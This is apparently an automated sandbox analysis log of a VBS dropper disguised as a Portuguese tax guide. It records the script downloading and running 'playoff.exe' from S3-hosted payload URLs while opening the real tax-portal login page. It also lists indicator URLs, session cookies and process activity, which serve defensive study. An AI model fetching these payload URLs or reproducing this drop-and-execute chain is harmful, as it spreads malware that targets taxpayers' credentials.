AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/icons/favicon.ico HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/icons/favicon.ico HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficDNS traffic detected: DNS query: playoffchampions.s3.eu-north-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: www.acesso.gov.pt
Source: global trafficDNS traffic detected: DNS query: static.portaldasfinancas.gov.pt
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: chromecache_94.4.drString found in binary or memory: http://fontawesome.io
Source: chromecache_94.4.drString found in binary or memory: http://fontawesome.io/license
Source: chromecache_93.4.dr, chromecache_88.4.dr, chromecache_109.4.drString found in binary or memory: http://getbootstrap.com)
Source: chromecache_117.4.dr, chromecache_108.4.drString found in binary or memory: http://jqueryvalidation.org/
Source: chromecache_96.4.dr, chromecache_103.4.drString found in binary or memory: http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-pref
Source: chromecache_100.4.dr, chromecache_113.4.drString found in binary or memory: http://unscriptable.com/index.php/2009/03/20/debouncing-javascript-methods/
Source: playoff.exe, 00000007.00000000.2223508151.00000000002C9000.00000020.00000001.01000000.0000000B.sdmp, playoff.exe, 00000007.00000003.2228095895.0000017A563EC000.00000004.00001000.00020000.00000000.sdmp, playoff.exe.0.drString found in binary or memory: https://ailiadasclubdasmilhas.s3.eu-north-1.amazonaws.com/CafeMusic.mpeg
Source: playoff.exe, 00000007.00000000.2223508151.00000000002C9000.00000020.00000001.01000000.0000000B.sdmp, playoff.exe, 00000007.00000003.2228095895.0000017A563EC000.00000004.00001000.00020000.00000000.sdmp, playoff.exe.0.drString found in binary or memory: https://ailiadasclubdasmilhas.s3.eu-north-1.amazonaws.com/DanceMarine.mpeg
Source: chromecache_93.4.dr, chromecache_88.4.dr, chromecache_109.4.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_92.4.dr, chromecache_120.4.drString found in binary or memory: https://info.portaldasfinancas.gov.pt/pt/at/Pages/Encarregado_protecao_dados.aspx
Source: chromecache_92.4.dr, chromecache_120.4.drString found in binary or memory: https://info.portaldasfinancas.gov.pt/pt/quem_somos/privacidade/Pages/privacidade.aspx
Source: wscript.exe, 00000000.00000003.2226243533.00000233BFCCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045060057.00000233BD94A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232386458.00000233BA6F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047326034.00000233BE771000.00000004.00000020.00020000.00000000.sdmp, GuiaAT256201.vbsString found in binary or memory: https://playoffchampions.s3.eu-north-1.amazonaws.com/xboxtv.mpeg
Source: wscript.exe, 00000000.00000003.2232386458.00000233BA6F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.acesso.gov.pt/v2/loginFo
Source: wscript.exe, 00000000.00000003.2226243533.00000233BFCCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045060057.00000233BD94A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053801050.00000233BA521000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232386458.00000233BA6F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2047326034.00000233BE771000.00000004.00000020.00020000.00000000.sdmp, GuiaAT256201.vbsString found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP76R
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP86
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP9
Source: wscript.exe, 00000000.00000003.2053993426.00000233BA572000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPC:
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPL-
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPQ60
Source: wscript.exe, 00000000.00000003.2050678399.00000233BA6FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPc
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPp
Source: wscript.exe, 00000000.00000003.2053801050.00000233BA521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPtCookiesgCj
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 3.5.216.50:443 -> 192.168.2.5:49704 version: TLS 1.2

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: GuiaAT256201.vbsInitial sample: Strings found which are bigger than 50
Source: playoff.exe.0.drStatic PE information: Number of sections : 11 > 10
Source: classification engineClassification label: mal76.evad.winVBS@18/69@11/9
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\xboxtv[1].mpegJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs"
Source: C:\Users\Public\xboxtv\playoff.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,14633557413047616428,5381384248003885766,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\xboxtv\playoff.exe "C:\users\public\xboxtv\playoff.exe"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAPJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\xboxtv\playoff.exe "C:\users\public\xboxtv\playoff.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,14633557413047616428,5381384248003885766,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: zipfldr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: chartv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\Public\xboxtv\playoff.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Google Drive.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: GuiaAT256201.vbsStatic file information: File size 7413387 > 1048576
Source: playoff.exe.0.drStatic PE information: section name: .didata
Source: C:\Users\Public\xboxtv\playoff.exeCode function: 7_2_00000074B237DF0C pushfd ; retf 7_2_00000074B237DF79
Source: C:\Users\Public\xboxtv\playoff.exeCode function: 7_2_00000074B237A258 push ecx; retf 7_2_00000074B237A259
Source: C:\Users\Public\xboxtv\playoff.exeCode function: 7_2_00000074B237DEDC pushfd ; retf 7_2_00000074B237DF79
Source: C:\Users\Public\xboxtv\playoff.exeCode function: 7_2_00000074B237E84B pushad ; ret 7_2_00000074B237E87C
Source: C:\Users\Public\xboxtv\playoff.exeCode function: 7_2_00000074B237A838 push ecx; retf 7_2_00000074B237A839
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\Public\xboxtv\playoff.exeJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
